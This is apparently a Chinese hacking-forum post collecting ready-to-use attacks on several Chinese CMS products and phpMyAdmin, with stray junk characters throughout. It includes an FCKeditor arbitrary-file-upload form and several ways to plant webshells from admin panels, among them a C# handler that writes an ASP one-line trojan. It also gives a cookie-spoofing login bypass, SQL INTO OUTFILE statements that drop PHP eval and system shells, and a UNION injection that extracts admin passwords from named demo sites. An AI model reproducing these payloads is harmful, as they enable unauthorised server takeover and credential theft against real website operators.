http://xxoo.com/controls/fckedit ... aspx/connector.aspx
. a! i# _* ~* w# W跳转到网站根目录上传任意文件。: H! s; T4 ?4 M% W# x) n
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件8 U- A+ v4 Z7 z' u! Q
<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">4 Q2 c1 P6 G# I# @# Y
Upload a new file:<br>& D( p0 V! {; Q9 t E
<input type="file" name="NewFile" size="50"><br>8 b. X1 t) \8 F8 k* O# J- A+ S
<input id="btnUpload" type="submit" value="Upload">7 Z/ O) R8 ?5 m; c
</form>2 ?5 [. r R6 B+ X, L
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- N ?3 v. A0 d
4 y+ B1 K( m% X$ g1 E/ ?3 eSDcms 后台拿webshell: O* v3 b# Q$ n
3 |+ G6 c- @: u% l2 I
第一种方法:
/ { r8 @$ |% s- Y/ Q" M2 j进入后台-->系统管理-->系统设置-->系统设置->网站名称;- O* E1 N3 }( ]
把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx' I8 j. C2 @( F/ j0 y) {
用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。
! Z# g5 h, U2 e: g. F' @- ~& w第二种方法:: _2 g! K& q- x; f
进入后台-->系统管理-->系统设置-->系统设置->上传设置;
' T4 q6 ^/ F' \/ t( V l在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!3 Z+ L9 `7 T" h% q
第三种方法:4 m- Y+ ` G9 N9 P9 B0 f/ _: ?
进入后台-->界面管理-->模板文件管理-->创建文件9 T8 j2 K2 _" ~: z) U
文件名写入getshell.ashx
- C2 ?/ h" p8 a2 E% A; v3 p# N内容写入下面内容:; v$ f, I+ n% j
/====================复制下面的=========================/
0 }. b& Y. V* i4 X' `% i+ D<%@ WebHandler Language="C#" Class="Handler" %>+ r- j/ P3 B# v+ u
using System;, H4 I* U# a0 z* M, M/ O
using System.Web;
- B+ Q% M* \1 v: G' _using System.IO;
( v. K/ d# v% Z: Vpublic class Handler : IHttpHandler {1 Z6 Z0 M, \* ^; W0 c1 b* Y
public void ProcessRequest (HttpContext context) {
1 Z* T/ _( ~2 D0 g, B: `, X9 P4 lcontext.Response.ContentType = "text/plain";! h$ F3 D0 s5 F. U. N
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
0 _% M: v9 ^7 e/ ~& P; `8 ^/ A+ V2 Jfile1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
/ s: y3 w! ^7 K$ M# a5 lfile1.Flush();+ ~" z6 z9 F$ k
file1.Close();
2 a7 J C$ f* d: |% \4 ?; E}
: _/ Y# }# R6 n" jpublic bool IsReusable {
! N% m" J6 [' t* g8 i ~get {+ _* a2 o+ d$ a% |7 g
return false;% v, h, c8 `% U( o. m; ?
}
$ z/ [2 e6 p7 D. s- \* D b8 i; A7 G7 k}
o1 r: u' p9 D, `0 [4 ~}
/ Z. `( S; [9 f+ |( F: c/=============================================/* ~. S. ^$ `7 z1 _( `7 Y3 n
访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx
! j$ o1 R/ j+ S* e: j$ o会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接& T; V5 d, h; U) u" o: c
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------( g$ C$ Y5 |* }( p7 {0 f1 K
; I) U& B& V/ G) N+ k7 iESCMS网站管理系统0day4 ]* r8 a }+ |: B, Q8 ^# H
1 `% ~$ _ u* T# X f9 E
后台登陆验证是通过admin/check.asp实现的
' [" n: V- T/ k: t5 N. p7 |: _* d$ m/ Z
首先我们打开http://target.com/admin/es_index.html
8 T, g V, a3 c- O; J3 {然后在COOKIE结尾加上
, b* n3 s+ J0 i- G2 T" W8 i; ESCMS$_SP2=ES_admin=st0p;
5 I# j( U- ?8 a- Y7 _修改,然后刷新. g; u9 f. R; p2 h. C
进后台了嘎..
( e, V- A! g! D6 S. Y然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL6 [! Z8 q% o( I* P* k
V4 \5 O5 T/ n% e" C! i6 B利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
# ]. v4 H( v3 v8 \5 }) l# b嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp: ^' h# I: s" t. v4 e2 @* o+ r
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
% t2 R' k3 _4 ~# v$ R在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了6 \9 |/ l1 B% x5 @- A8 [ e
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 }8 z! \5 |: ]' {9 G& p* ^, P: \5 I/ s1 [
宁志网站管理系统后台无验证漏洞及修复$ S+ K* D; f, k) [
$ g) p! ]" v5 l; \5 [! J4 y
网上搜了一下,好像没有发布.如有雷同纯粹巧合!
8 b W1 t/ S: O9 _- s官方网站:www.ningzhi.net/ }1 C5 F; I/ F* S
学校网站管理系统 V.2011版本
/ |8 X* {* y' K$ |; ?3 Y1 v+ rhttp://down.chinaz.com/soft/29943.htm
" A8 w: Z9 h# x y其它版本(如:政府版等),自行下载.
. |: O! p- x8 G漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
5 d( n8 n3 {/ A; ^8 Wlogin.asp代码如下:
2 R! l, X, Y$ e3 k4 u<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %> % [* [2 Y7 S: s% @8 T3 O
manage.asp代码我就不帖出来了.反正也没验证.
" \' ^4 i6 @/ G7 C3 ^只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!$ ^" ~& W/ F1 }% C: \! C
漏洞利用:
( `1 g1 s( T% z: P4 {% l/ ^6 {直接访问http://www.0855.tv/admin/manage.asp
2 @& |' m6 m/ }8 q6 X0 W数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
- A* \" x: E2 b$ o+ }& T& n----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" ?) q! e2 u; m7 V2 X0 D+ ]& [5 E
D: C6 J1 l# ^3 ?phpmyadmin拿shell的四种方法总结及修复
/ ~/ Y# r! w+ Z1 ]
+ T, K& }7 _7 _1 _$ J$ x方法一:& q- s4 f0 I$ C
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
* G( ]1 I6 g2 z6 u* eINSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');* b& S4 n2 Q' Z4 M U( Z
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
/ E1 @* b3 Z! k3 B) e- b, @! l----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
2 m) c' J/ j, a% K% v 一句话连接密码:7on8 ^: c9 n; S# G9 h; S$ _
方法二:" m" B1 Q4 w: F5 W
读取文件内容: select load_file('E:/xamp/www/s.php');
) j* |7 {" `/ L5 U写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
t" E' W" X9 Xcmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'5 f" g+ g5 x+ l% ]
方法三:
- o# Y7 Z& H0 q5 |+ XJhackJ版本 PHPmyadmin拿shell
# N' V1 \/ c; _$ rCreate TABLE study (cmd text NOT NULL);
# O- V! S) Q! Z% M& Q" n0 y! eInsert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
* @3 s; r! K! C, N3 @. }5 rselect cmd from study into outfile 'E:/wamp/www/7.php';- y. e5 j, J" |6 Q
Drop TABLE IF EXISTS study;
% s* g0 f9 l% q# M; K+ s# I' D R* I<?php eval($_POST[cmd])?>2 u: l ?1 ]9 U' a6 o! U. Z9 H
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。: m! T/ p* f: X7 b( y$ G
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1
0 @ G3 x& U" R3 T- ]. [SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1+ S) l& N1 j* ?) }/ F3 n
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
4 ^& B' G2 X0 u8 D; V) w方法四:
8 Q0 @! n+ D+ [8 W- S6 M* [" \select load_file('E:/xamp/www/study.php');
; |8 L& t* y3 G, r+ d4 G5 t' g0 Vselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'4 E% J0 R; m, u: n% G7 e
然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
- y# p e3 Q: L6 l: t-----------------------------------------------------------------------------------------------------------------------------------------------------------------------4 {" N1 e2 }. N- Q* ]
1 c* \' U* L! x1 F# {$ U
NO.001中学网站管理系统 Build 110628 注入漏洞
( T+ _6 K( @6 \- Y5 C6 P/ H7 ~# n2 g. o5 c: X) ]( v
NO.001中学网站管理系统功能模块:
9 m/ m! ?# ^5 g1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
+ Y J9 w, I& L4 f2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
i: Q9 g- B6 k& B1 p6 d' d! ^/ A3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息! S, z6 I9 o9 {4 n/ T
4.视频图片管理:一级分类,动态添加视频或者图片等信息
; O2 D7 j6 k% N# |! R- Z# V# u' h- q* k5.留言管理:对留言,修改,删除、回复等管理
- K2 I: d, C. ^8 b9 A6.校友频道:包括校友资料excel导出、管理等功能
0 J5 u% J) o: z" d( S7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
# z: I9 P# B& {8 {% U2 I' Y3 S默认后台:admin/login.asp
0 P3 l4 }7 h- \9 x1 q官方演示:http://demo.001cms.net" Q4 f( Y2 @ i. G
源码下载地址:http://down.chinaz.com/soft/30187.htm
# C5 y6 ~# O9 \7 k2 aEXP:
4 H& U. m7 u* _2 n+ [union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
! r, g/ O- u; z( W0 J0 t测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
) I- x" `! N: Z6 t4 Ygetshell:后台有备份,你懂的3 ^$ s- P7 V! Z1 I& @" g5 G4 [
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。- [0 ~: x8 e% T* J" O+ E
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
匿名
发表于 2017-10-28 08:21:04
发表于 2012-9-13 16:58:38
收藏
支持
反对